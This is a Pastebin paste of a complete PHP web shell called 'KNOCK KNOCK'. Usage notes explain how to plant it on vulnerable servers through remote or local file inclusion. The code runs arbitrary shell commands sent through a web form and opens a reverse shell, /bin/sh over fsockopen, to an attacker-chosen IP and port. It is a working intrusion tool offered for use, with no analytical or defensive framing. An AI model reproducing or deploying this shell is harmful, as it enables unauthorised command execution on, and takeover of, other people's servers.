DarkProgrammer000

Remote Shell [File Inclusion]

Aug 12th, 2019
343
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3.     Name : KNOCK KNOCK
  4.     Owner : Naman Sahore
  5.     Email : namansahore@gmail.com
  6.     Published on : 30th July 2017
  7.  
  8.     This program is distributed in the hope that it will be useful,
  9.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  10.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
  11.  
  12.     This shell scrpit can be used for performing Remote File Inclusion
  13.     as well as Local File Inclusion( by adding .php at the end of
  14.     script) and getting REVERSE SHELL from vulnerable server
  15.     or performing shell command on browser.
  16.  
  17.     HOW TO USE:
  18.     FOR RFI
  19.         Clear .txt extention and upload the script on a server and
  20.         preform RFI.
  21.     FOR LFI
  22.         Clear .txt and add .php extention to the script and
  23.         perform LFI by uploading shell script on a
  24.         vulnerable server.
  25.  
  26.         Comment for more information.
  27. */
  28. ?>
  29. <body style="background-color:rgb(200,200,200);">
  30.     <form action="<?php $link = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; echo "{$link}"?>" method="POST">
  31.     <center>
  32.         <strong>
  33.         </br>
  34.         <h1 color="rgb(255, 0, 31)"><b>KNOCK KNOCK</b></h1>
  35.         </br>
  36.         <h2 color="rgb(255, 0, 31)"><b>SHELL</b></h2>
  37.             COMMAND : <input type="text" name="cmd" value=""/>
  38.             <input type="submit" name="submit" value="CMD" />
  39.         </br></br>
  40.         <h2 color="rgb(255, 0, 31)"><b>R SHELL USING PHP</b></h2>
  41.         <p><b><i>*NOTE : </b>Before triggring rshell, start listening</i></p>
  42.         </br>
  43.         IP : <input type="text" name="ip" value=""/>&nbsp;PORT : <input type="text" name="port" value=""/>
  44.         <input type="submit" name="submit" value="R SHELL" />
  45.         </strong>
  46.     </center>
  47.     <br />
  48.     <strong>
  49.     <font size="5">
  50.         <?php
  51.         if(isset($_POST["cmd"])){
  52.             $cmd=$_POST["cmd"];
  53.             $output = shell_exec("{$cmd} 2>&1");
  54.             echo $cmd."</br>"."<pre>".$output."</pre>";
  55.         }
  56.         if (isset($_POST["ip"]) && isset($_POST["port"])) {
  57.             $sock="sock";
  58.             $cmd = "php -r '$"."{$sock}"."=fsockopen("."\"{$_POST["ip"]}\"".","."{$_POST["port"]}".");shell_exec(\""."/bin/sh -i <&3 >&3 2>&3"."\");'";
  59.             if (strlen($cmd)>66) {
  60.                 shell_exec("{$cmd} 2>&1");
  61.             }
  62.         }
  63.         ?>
  64.     </font>
  65.     </strong>
  66. </body>
RAW Paste Data